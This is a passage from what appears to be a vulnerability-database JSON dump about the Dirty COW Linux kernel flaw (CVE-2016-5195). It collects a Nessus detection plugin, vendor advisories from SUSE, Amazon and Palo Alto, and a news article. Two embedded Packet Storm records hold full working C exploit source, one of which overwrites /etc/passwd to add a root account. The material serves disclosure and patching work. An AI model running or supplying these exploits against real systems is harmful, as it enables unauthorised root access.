value:\"p-cpe:/a:redhat:enterprise_linux:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/11/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/10/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/24\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-5195\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for RHSA-2016:2098\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2016:2098\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security 
advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-3.10.0-327.36.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-3.10.0-327.36.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"kernel-abi-whitelists-3.10.0-327.36.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-debug-3.10.0-327.36.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-debug-3.10.0-327.36.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-debug-debuginfo-3.10.0-327.36.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-debug-debuginfo-3.10.0-327.36.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-debug-devel-3.10.0-327.36.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-debug-devel-3.10.0-327.36.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-debuginfo-3.10.0-327.36.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-debuginfo-3.10.0-327.36.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-debuginfo-common-s390x-3.10.0-327.36.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-debuginfo-common-x86_64-3.10.0-327.36.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-devel-3.10.0-327.36.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-devel-3.10.0-327.36.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"kernel-doc-3.10.0-327.36.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-headers-3.10.0-327.36.3.el7\")) flag++;\n\n if 
(rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-headers-3.10.0-327.36.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-kdump-3.10.0-327.36.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-kdump-debuginfo-3.10.0-327.36.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-kdump-devel-3.10.0-327.36.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-tools-3.10.0-327.36.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-tools-debuginfo-3.10.0-327.36.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-tools-libs-3.10.0-327.36.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-tools-libs-devel-3.10.0-327.36.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"perf-3.10.0-327.36.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"perf-3.10.0-327.36.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"perf-debuginfo-3.10.0-327.36.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"perf-debuginfo-3.10.0-327.36.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"python-perf-3.10.0-327.36.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"python-perf-3.10.0-327.36.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"python-perf-debuginfo-3.10.0-327.36.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"python-perf-debuginfo-3.10.0-327.36.3.el7\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if 
(tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-abi-whitelists / kernel-debug / etc\");\n }\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2016-10-22T01:27:52", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5195"], "edition": 1, "description": "The SUSE Linux Enterprise 11 SP2 LTSS kernel was updated to fix one\n security issue.\n\n This security bug was fixed:\n\n - CVE-2016-5195: Local privilege escalation using MAP_PRIVATE. It is\n reportedly exploited in the wild (bsc#1004418).\n\n", "modified": "2016-10-22T00:10:22", "published": "2016-10-22T00:10:22", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00040.html", "id": "SUSE-SU-2016:2596-1", "type": "suse", "title": "Security update for the Linux Kernel (important)", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2016-10-27T01:27:51", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5195"], "edition": 1, "description": "This update for the Linux Kernel 3.12.60-52_54 fixes several issues.\n\n The following security bugs were fixed:\n - CVE-2016-5195: A local privilege escalation using MAP_PRIVATE was fixed,\n which is reportedly exploited in the wild (bsc#1004419).\n\n", "modified": "2016-10-27T01:06:19", "published": "2016-10-27T01:06:19", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00065.html", "id": "SUSE-SU-2016:2657-1", "type": "suse", "title": "Security update for Linux Kernel Live Patch 15 for SLE 12 (important)", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2016-10-21T21:28:03", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5195"], "edition": 1, "description": "The SUSE Linux Enterprise 12 GA LTSS kernel was updated to fix two issues.\n\n This security bug was fixed:\n\n - CVE-2016-5195: Local privilege escalation using MAP_PRIVATE. 
It is\n reportedly exploited in the wild (bsc#1004418).\n\n This non-security bug was fixed:\n\n - sched/core: Fix a race between try_to_wake_up() and a woken up task\n (bsc#1002165, bsc#1001419).\n\n", "modified": "2016-10-21T21:08:21", "published": "2016-10-21T21:08:21", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00039.html", "id": "SUSE-SU-2016:2593-1", "type": "suse", "title": "Security update for the Linux Kernel (important)", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2016-10-21T17:27:49", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5195"], "edition": 1, "description": "The SUSE Linux Enterprise 12 SP1 kernel was updated to fix two issues.\n\n This security bug was fixed:\n\n - CVE-2016-5195: Local privilege escalation using MAP_PRIVATE. It is\n reportedly exploited in the wild (bsc#1004418).\n\n This non-security bug was fixed:\n\n - sched/core: Fix a race between try_to_wake_up() and a woken up task\n (bsc#1002165, bsc#1001419).\n\n", "modified": "2016-10-21T19:14:25", "published": "2016-10-21T19:14:25", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00038.html", "id": "SUSE-SU-2016:2592-1", "type": "suse", "title": "Security update for the Linux Kernel (important)", "cvss": {"score": 0.0, "vector": "NONE"}}], "canvas": [{"lastseen": "2019-05-29T19:48:29", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-5195"], "edition": 2, "description": "**Name**| linux_foll_write_cow \n---|--- \n**CVE**| CVE-2016-5195 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| Linux Kernel FOLL_WRITE gup COW local privilege escalation \n**Notes**| Repeatability: Multiple Times \nNotes: \n \nTested on: \n\\- RedHat 7 \n\\- Ubuntu 14 \n\\- Ubuntu 16 \n \n \nVENDOR: Linux \nCVE Url: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5195 \nCVE Name: CVE-2016-5195 \n\n", "modified": "2016-11-10T21:59:00", "published": "2016-11-10T21:59:00", 
"href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/linux_foll_write_cow", "id": "LINUX_FOLL_WRITE_COW", "type": "canvas", "title": "Immunity Canvas: LINUX_FOLL_WRITE_COW", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "paloalto": [{"lastseen": "2020-12-24T13:20:55", "bulletinFamily": "software", "cvelist": ["CVE-2016-5195"], "description": "A vulnerability exists in the kernel of PAN-OS that may result in an elevation of privilege. This issue is publicly known as Dirty COW (ref # PAN-68074 / CVE-2016-5195).\nPAN-OS may be impacted by the Dirty COW (CVE-2016-5195) attack. A race condition was found in the way the Linux kernel's memory subsystem handles the copy-on-write breakage of private read-only memory mappings. An attacker would first require access to a shell on the device before they could use this exploit. Shell access is significantly restricted on the device. The Command Line Interface (CLI) is not shell access and therefore this issue cannot be exploited via the CLI.\nThis issue affects PAN-OS 5.1, PAN-OS 6.0, PAN-OS 6.1, PAN-OS 7.0.13, PAN-OS 7.1.7 and earlier\n\n\n**Work around:**\nPalo Alto Networks recommends implementing best practice by allowing web interface access only to a dedicated management network. 
Additionally, restrict the set of IP addresses to a subset of authorized sources that you allow to interact with the management network.\n", "edition": 6, "modified": "2017-02-21T19:30:00", "published": "2017-02-21T19:30:00", "id": "PAN-SA-2017-0003", "href": "https://securityadvisories.paloaltonetworks.com/CVE-2016-5195", "title": "Kernel Vulnerability ", "type": "paloalto", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:20:07", "description": "", "published": "2016-11-25T00:00:00", "type": "packetstorm", "title": "Linux Kernel Dirty COW PTRACE_POKEDATA Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-5195"], "modified": "2016-11-25T00:00:00", "id": "PACKETSTORM:139922", "href": "https://packetstormsecurity.com/files/139922/Linux-Kernel-Dirty-COW-PTRACE_POKEDATA-Privilege-Escalation.html", "sourceData": "`// $ echo pikachu|sudo tee pokeball;ls -l pokeball;gcc -pthread pokemon.c -o d;./d pokeball miltank;cat pokeball \n#include <fcntl.h> //// pikachu \n#include <pthread.h> //// -rw-r--r-- 1 root root 8 Apr 4 12:34 pokeball \n#include <string.h> //// pokeball \n#include <stdio.h> //// (___) \n#include <stdint.h> //// (o o)_____/ \n#include <sys/mman.h> //// @@ ` \\ \n#include <sys/types.h> //// \\ ____, /miltank \n#include <sys/stat.h> //// // // \n#include <sys/wait.h> //// ^^ ^^ \n#include <sys/ptrace.h> //// mmap bc757000 \n#include <unistd.h> //// madvise 0 \n////////////////////////////////////////////// ptrace 0 \n////////////////////////////////////////////// miltank \n////////////////////////////////////////////// \nint f ;// file descriptor \nvoid *map ;// memory map \npid_t pid ;// process id \npthread_t pth ;// thread \nstruct stat st ;// file info \n////////////////////////////////////////////// \nvoid *madviseThread(void *arg) {// madvise thread \nint i,c=0 ;// counters \nfor(i=0;i<200000000;i++)//////////////////// loop to 2*10**8 \nc+=madvise(map,100,MADV_DONTNEED) 
;// race condition \nprintf(\"madvise %d\\n\\n\",c) ;// sum of errors \n}// /madvise thread \n////////////////////////////////////////////// \nint main(int argc,char *argv[]) {// entrypoint \nif(argc<3)return 1 ;// ./d file contents \nprintf(\"%s \\n\\ \n(___) \\n\\ \n(o o)_____/ \\n\\ \n@@ ` \\\\ \\n\\ \n\\\\ ____, /%s \\n\\ \n// // \\n\\ \n^^ ^^ \\n\\ \n\", argv[1], argv[2]) ;// dirty cow \nf=open(argv[1],O_RDONLY) ;// open read only file \nfstat(f,&st) ;// stat the fd \nmap=mmap(NULL ,// mmap the file \nst.st_size+sizeof(long) ,// size is filesize plus padding \nPROT_READ ,// read-only \nMAP_PRIVATE ,// private mapping for cow \nf ,// file descriptor \n0) ;// zero \nprintf(\"mmap %lx\\n\\n\",(unsigned long)map);// sum of error code \npid=fork() ;// fork process \nif(pid) {// if parent \nwaitpid(pid,NULL,0) ;// wait for child \nint u,i,o,c=0,l=strlen(argv[2]) ;// util vars (l=length) \nfor(i=0;i<10000/l;i++)//////////////////// loop to 10K divided by l \nfor(o=0;o<l;o++)//////////////////////// repeat for each byte \nfor(u=0;u<10000;u++)////////////////// try 10K times each time \nc+=ptrace(PTRACE_POKETEXT ,// inject into memory \npid ,// process id \nmap+o ,// address \n*((long*)(argv[2]+o))) ;// value \nprintf(\"ptrace %d\\n\\n\",c) ;// sum of error code \n}// otherwise \nelse {// child \npthread_create(&pth ,// create new thread \nNULL ,// null \nmadviseThread ,// run madviseThred \nNULL) ;// null \nptrace(PTRACE_TRACEME) ;// stat ptrace on child \nkill(getpid(),SIGSTOP) ;// signal parent \npthread_join(pth,NULL) ;// wait for thread \n}// / child \nreturn 0 ;// return \n}// / entrypoint \n////////////////////////////////////////////// \n \n \n`\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/139922/dirtycowptrace-escalate.txt"}, {"lastseen": "2016-12-05T22:19:16", "description": "", "published": "2016-11-28T00:00:00", "type": "packetstorm", "title": 
"Linux Kernel Dirty COW PTRACE_POKEDATA Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-5195"], "modified": "2016-11-28T00:00:00", "id": "PACKETSTORM:139923", "href": "https://packetstormsecurity.com/files/139923/Linux-Kernel-Dirty-COW-PTRACE_POKEDATA-Privilege-Escalation.html", "sourceData": "`// \n// This exploit uses the pokemon exploit as a base and automatically \n// generates a new passwd line. The original /etc/passwd is then \n// backed up to /tmp/passwd.bak and overwritten with the new line. \n// The user will be prompted for the new password when the binary is run. \n// After running the exploit you should be able to login with the newly \n// created user. \n// \n// Original exploit: \n// https://github.com/dirtycow/dirtycow.github.io/blob/master/pokemon.c \n// \n// To use this exploit modify the user values according to your needs \n// \n// Compile with \n// \n// gcc -pthread dirty.c -o dirty -lcrypt \n// \n// and just run the newly create binary with ./dirty \n// \n// DON'T FORGET TO RESTORE YOUR /etc/passwd AFTER RUNNING THE EXPLOIT ! 
\n// \n// Exploit adopted by Christian \"FireFart\" Mehlmauer \n// https://firefart.at \n// \n \n \n#include <fcntl.h> \n#include <pthread.h> \n#include <string.h> \n#include <stdio.h> \n#include <stdint.h> \n#include <sys/mman.h> \n#include <sys/types.h> \n#include <sys/stat.h> \n#include <sys/wait.h> \n#include <sys/ptrace.h> \n#include <stdlib.h> \n#include <unistd.h> \n#include <crypt.h> \n \nconst char *filename = \"/etc/passwd\"; \nconst char *backup_filename = \"/tmp/passwd.bak\"; \nconst char *salt = \"firefart\"; \n \nint f; \nvoid *map; \npid_t pid; \npthread_t pth; \nstruct stat st; \n \nstruct Userinfo { \nchar *username; \nchar *hash; \nint user_id; \nint group_id; \nchar *info; \nchar *home_dir; \nchar *shell; \n}; \n \nchar *generate_password_hash(char *plaintext_pw) { \nreturn crypt(plaintext_pw, salt); \n} \n \nchar *generate_passwd_line(struct Userinfo u) { \nconst char *format = \"%s:%s:%d:%d:%s:%s:%s\\n\"; \nint size = snprintf(NULL, 0, format, u.username, u.hash, \nu.user_id, u.group_id, u.info, u.home_dir, u.shell); \nchar *ret = malloc(size + 1); \nsprintf(ret, format, u.username, u.hash, u.user_id, \nu.group_id, u.info, u.home_dir, u.shell); \nreturn ret; \n} \n \nvoid *madviseThread(void *arg) { \nint i, c = 0; \nfor(i = 0; i < 200000000; i++) { \nc += madvise(map, 100, MADV_DONTNEED); \n} \nprintf(\"madvise %d\\n\\n\", c); \n} \n \nint copy_file(const char *from, const char *to) { \n// check if target file already exists \nif(access(to, F_OK) != -1) { \nprintf(\"File %s already exists! 
Please delete it and run again\\n\", \nto); \nreturn -1; \n} \n \nchar ch; \nFILE *source, *target; \n \nsource = fopen(from, \"r\"); \nif(source == NULL) { \nreturn -1; \n} \ntarget = fopen(to, \"w\"); \nif(target == NULL) { \nfclose(source); \nreturn -1; \n} \n \nwhile((ch = fgetc(source)) != EOF) { \nfputc(ch, target); \n} \n \nprintf(\"%s successfully backed up to %s\\n\", \nfrom, to); \n \nfclose(source); \nfclose(target); \n \nreturn 0; \n} \n \nint main(int argc, char *argv[]) \n{ \n// backup file \nint ret = copy_file(filename, backup_filename); \nif (ret != 0) { \nexit(ret); \n} \n \nstruct Userinfo user; \n// set values, change as needed \nuser.username = \"firefart\"; \nuser.user_id = 0; \nuser.group_id = 0; \nuser.info = \"pwned\"; \nuser.home_dir = \"/root\"; \nuser.shell = \"/bin/bash\"; \n \nchar *plaintext_pw = getpass(\"Please enter new password: \"); \nuser.hash = generate_password_hash(plaintext_pw); \nchar *complete_passwd_line = generate_passwd_line(user); \nprintf(\"Complete line:\\n%s\\n\", complete_passwd_line); \n \nf = open(filename, O_RDONLY); \nfstat(f, &st); \nmap = mmap(NULL, \nst.st_size + sizeof(long), \nPROT_READ, \nMAP_PRIVATE, \nf, \n0); \nprintf(\"mmap: %lx\\n\",(unsigned long)map); \npid = fork(); \nif(pid) { \nwaitpid(pid, NULL, 0); \nint u, i, o, c = 0; \nint l=strlen(complete_passwd_line); \nfor(i = 0; i < 10000/l; i++) { \nfor(o = 0; o < l; o++) { \nfor(u = 0; u < 10000; u++) { \nc += ptrace(PTRACE_POKETEXT, \npid, \nmap + o, \n*((long*)(complete_passwd_line + o))); \n} \n} \n} \nprintf(\"ptrace %d\\n\",c); \n} \nelse { \npthread_create(&pth, \nNULL, \nmadviseThread, \nNULL); \nptrace(PTRACE_TRACEME); \nkill(getpid(), SIGSTOP); \npthread_join(pth,NULL); \n} \n \nprintf(\"Done! 
Check %s to see if the new user was created\\n\", filename); \nprintf(\"You can log in with username %s and password %s.\\n\\n\", \nuser.username, plaintext_pw); \nprintf(\"\\nDON'T FORGET TO RESTORE %s FROM %s !!!\\n\\n\", \nfilename, backup_filename); \nreturn 0; \n} \n \n`\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/139923/dirtydirtycow-escalate.txt"}], "amazon": [{"lastseen": "2020-11-10T12:35:54", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5195"], "description": "**Issue Overview:**\n\nA race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system.\n\n(Updated 2016-11-10: This advisory was upgraded to Critical.)\n\n \n**Affected Packages:** \n\n\nkernel\n\n \n**Issue Correction:** \nRun _yum update kernel_ to update your system. 
You will need to reboot your system in order for the new kernel to be running.\n\n \n\n\n**New Packages:**\n \n \n i686: \n kernel-4.4.23-31.54.amzn1.i686 \n kernel-devel-4.4.23-31.54.amzn1.i686 \n kernel-tools-debuginfo-4.4.23-31.54.amzn1.i686 \n kernel-tools-devel-4.4.23-31.54.amzn1.i686 \n kernel-debuginfo-common-i686-4.4.23-31.54.amzn1.i686 \n perf-4.4.23-31.54.amzn1.i686 \n kernel-debuginfo-4.4.23-31.54.amzn1.i686 \n perf-debuginfo-4.4.23-31.54.amzn1.i686 \n kernel-tools-4.4.23-31.54.amzn1.i686 \n kernel-headers-4.4.23-31.54.amzn1.i686 \n \n noarch: \n kernel-doc-4.4.23-31.54.amzn1.noarch \n \n src: \n kernel-4.4.23-31.54.amzn1.src \n \n x86_64: \n kernel-tools-devel-4.4.23-31.54.amzn1.x86_64 \n kernel-4.4.23-31.54.amzn1.x86_64 \n kernel-tools-debuginfo-4.4.23-31.54.amzn1.x86_64 \n perf-debuginfo-4.4.23-31.54.amzn1.x86_64 \n kernel-devel-4.4.23-31.54.amzn1.x86_64 \n kernel-tools-4.4.23-31.54.amzn1.x86_64 \n perf-4.4.23-31.54.amzn1.x86_64 \n kernel-debuginfo-4.4.23-31.54.amzn1.x86_64 \n kernel-headers-4.4.23-31.54.amzn1.x86_64 \n kernel-debuginfo-common-x86_64-4.4.23-31.54.amzn1.x86_64 \n \n \n", "edition": 4, "modified": "2016-10-20T04:11:00", "published": "2016-10-20T04:11:00", "id": "ALAS-2016-757", "href": "https://alas.aws.amazon.com/ALAS-2016-757.html", "title": "Critical: kernel", "type": "amazon", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2018-01-27T09:18:04", "bulletinFamily": "info", "cvelist": ["CVE-2016-5195"], "description": "[](<https://3.bp.blogspot.com/-iDWfxV-PPM8/WAnl79IpuHI/AAAAAAAAp5Y/5lTGfIqtuFYbi_zfNU_ORAiUfLceVljCACLcB/s1600/dirty-cow-linux-kernel-exploit.png>)\n\nA nine-year-old critical vulnerability has been discovered in virtually all versions of the Linux operating system and is actively being exploited in the wild. 
\n \nDubbed \"**Dirty COW**,\" the Linux kernel security flaw (CVE-2016-5195) is a mere privilege-escalation vulnerability, but researchers are taking it extremely seriously due to many reasons. \n \nFirst, it's very easy to develop exploits that work reliably. Secondly, the Dirty COW flaw exists in a section of the Linux kernel, which is a part of virtually every distro of the open-source operating system, including RedHat, Debian, and Ubuntu, released for almost a decade. \n \nAnd most importantly, the researchers have discovered attack code that indicates the Dirty COW vulnerability is being actively exploited in the wild. \n \nDirty COW potentially allows any installed malicious app to gain administrative (root-level) access to a device and completely hijack it within just 5 seconds. \n \nEarlier this week, [Linus Torvalds admitted](<https://lkml.org/lkml/2016/10/19/860>) that 11 years ago he first spotted this issue and also tried to fix it, but then he left it unpatched because at the time it was hard to trigger. \n \n\n\n### Why is the Flaw called Dirty COW?\n\n \nThe bug, marked as \"High\" priority, gets its name from the copy-on-write (COW) mechanism in the Linux kernel, which is so broken that any application or malicious program can tamper with read-only root-owned executable files and setuid executables. \n\n\n> \"A race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings,\" reads the [website](<http://dirtycow.ninja/>) dedicated to Dirty COW. \n\n> \"An unprivileged local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system.\"\n\nThe Dirty COW vulnerability has been present in the Linux kernel since version 2.6.22 in 2007, and is also believed to be present in Android, which is powered by the Linux kernel. 
\n \n\n\n### Patch Your Linux-powered Systems Immediately\n\n \nAccording to the website, the Linux kernel has been patched, and major vendors such as [RedHat](<https://access.redhat.com/security/cve/cve-2016-5195>), [Ubuntu](<http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-5195.html>) and [Debian](<https://security-tracker.debian.org/tracker/CVE-2016-5195>) have already rolled out fixes for their respective Linux distributions. \n \nOrganizations and individuals have been urged to install a patch for their Linux-powered systems, phones and gadgets as soon as possible or risk falling victim to the Linux kernel-level security flaw affecting nearly every distro of the open-source OS. \n \nThe vulnerability was discovered by security researcher Phil Oester, who found at least one in-the-wild attack exploiting this particular vulnerability. He found the exploit using an HTTP packet capture. \n\n\nThe vulnerability disclosure followed the tradition of branding high-profile security vulnerabilities like [Heartbleed](<https://thehackernews.com/2014/04/heartbleed-bug-explained-10-most.html>), [Poodle](<https://thehackernews.com/2014/10/poodle-ssl-30-attack-exploits-widely_14.html>), [FREAK](<https://thehackernews.com/2015/03/freak-openssl-vulnerability.html>), and [GHOST](<https://thehackernews.com/2015/01/ghost-linux-security-vulnerability27.html>). \n \nThe Dirty COW website states: \n\n\n> \"It would have been fantastic to eschew this ridiculousness because we all make fun of branded vulnerabilities too, but this was not the right time to make that stand. 
So we created a website, an online shop, a Twitter account, and used a logo that a professional designer created.\"\n\nYou can find more technical details about the Dirty COW vulnerability and exploit on the bug's official [website](<http://dirtycow.ninja/>), [RedHat](<https://access.redhat.com/security/vulnerabilities/2706661>) site, and [GitHub](<https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails>) page.\n", "modified": "2016-10-25T15:07:13", "published": "2016-10-20T23:02:00", "id": "THN:B571C1AAA8CDDC10150ABA0BF22B19E6", "href": "https://thehackernews.com/2016/10/linux-kernel-exploit.html", "type": "thn", "title": "Dirty COW \u2014 Critical Linux Kernel Flaw Being Exploited in the Wild", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-04-09T07:54:53", "bulletinFamily": "info", "cvelist": ["CVE-2016-5195"], "description": "[](<https://1.bp.blogspot.com/-FYiOvknu4vY/XKxF4mYpV2I/AAAAAAAAztw/qfugwyFZSvUfDpDrIn4JxRzNFmIunzEjwCLcBGAs/s728-e100/ios-malware-min.jpg>)\n\nCybersecurity researchers have discovered an iOS version of the powerful mobile phone surveillance app that was initially targeting Android devices through apps on 